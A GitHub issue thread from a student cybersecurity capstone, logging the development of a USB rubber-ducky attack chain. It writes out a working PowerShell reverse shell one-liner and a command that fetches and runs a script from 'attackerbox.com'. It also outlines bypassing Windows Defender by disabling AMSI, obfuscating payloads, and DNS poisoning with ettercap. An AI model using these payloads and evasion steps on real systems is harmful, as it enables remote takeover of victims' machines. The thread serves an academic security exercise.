search

serate-actual / CNCS-Capstone

Senior Capstone project for Champlain College's Computer Networking and Cybersecurity B.S. program
0 stars 0 forks source link

Research and implement ways to establish Command & Control #17

Closed serate-actual closed 2 years ago

serate-actual commented 2 years ago

SSH sessions Web Shells

Maybe display a metasploitable shell? This would be really cool but also a HUGE reach.

serate-actual commented 2 years ago

Lv. 0: Netcat/telnet shell

Lv. 1: Web Shell See: https://hacksland.net/build-a-simple-web-shell/

serate-actual commented 2 years ago

https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ Okay, hear me out A netcat shell REQUIRES I know an IP of an attacker box What if I couple this with a DNS poisoning attack. I.e I open netcat to mydomain.net, but mydomain.net is dns poisoned to my attack box. I could easily create the "dumb" netcat script, and then create the SMART netcat script.

serate-actual commented 2 years ago

okay netcat isn't default on windows help solution 1 - wget/curl/equivalent nc.exe and run it and then delete later solution 2 - Understand what's going on with the powershell thing here Okay, it looks like a blend of solution 1 & solution 2 is what I will use. Currently, the attack path looks like

  1. set up an attacker box with a web server/dns poisoning/ command & control stuff on it 1.5. DNS poison attackerbox.com to the web server, which has my dictionary of exploits/webshells on it 1.75. Start a netcat session on my attacker box
  2. get someone to plug in my usb
  3. usb types in powershell -exec bypass -f http://attackerbox.com/nc.ps1
    • nc.ps1 is the commands for a web shell / literally anything else & also references my attacker box by attackerbox.com
  4. win
serate-actual commented 2 years ago

Currently setting up a script for kali to set up web server

serate-actual commented 2 years ago

https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3 maybe helpful for netcat reverse shell

serate-actual commented 2 years ago

Okay, I tried that netcat reverse shell. Bravo windows defender, you blocked it. https://github.com/danielbohannon/Invoke-Obfuscation I'm gonna try this tool now

serate-actual commented 2 years ago

Okay, obfuscation module is broken - However, I demo'd it with windows defender DISABLED

serate-actual commented 2 years ago

https://pentestlaboratories.com/tag/obfuscation/' Probably going to try base64 encoded just to get it done

serate-actual commented 2 years ago

This works to bypass the windows defender by bypassing AMSI (basically the utility that scans for malicious code) by setting the amsiinitFailed flag to prevent AMSI from running.

From Fabian Mosch

serate-actual commented 2 years ago

Okay, so the oneliner for netcat is broken??

IT SHOULD print like this $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

HOWEVER THIS happens

-ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); $client = New-Object System.Net.Sockets.TCPClient("192.168.50.44,4444");$stream = $client.GetStream();[byte[]]$bytes = ))\

-ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); $client = New-Object System.Net.Sockets.TCPClient("192.168.50.44,4444");$stream = $client.GetStream();[byte[]]$bytes = *b

It kinda dies at the bytes = section. It looks like it's not affected by the syntax. I am going to see how much lorem ipsum that my digispark can print before having an error

serate-actual commented 2 years ago

Okay, the lorem ipsum test was very . . . enlightening. It compiles and uploads, but DOESN'T do anything with a certain amount of text (like 2-3 lines of lorem ipsum). HOWEVER, it does really well with just printing repeated text (probably something to do with memory) This probably also explains the corruption at the end of it, due to some memory issues.

serate-actual commented 2 years ago

510 characters = arduino has a bad time 313 characters = happy arduino it's not 255 or 512 . . . HELP WHY DOESNT IT MAKE SENSE

I guess i'll have to curl literally everything and pass directly to powershell, which works.

Time to figure out dns poisoning :)

serate-actual commented 2 years ago

https://null-byte.wonderhowto.com/how-to/tutorial-dns-spoofing-0167796/

okay here goes the rough idea of my attack

  1. set up ettercap DNS poisoning (whole network, but for my tests, just a selected IP)
  2. user plugs in usb
  3. USB flushes the dns cache
  4. USB curls the poisoned IP and sends the output to powershell
  5. win!!!
serate-actual commented 2 years ago

Making a python script

serate-actual commented 2 years ago

Python script finished - at https://github.com/SirSertile/CNCS-Capstone/tree/main/Design%20Files/Rubber%20Ducky/PythonScript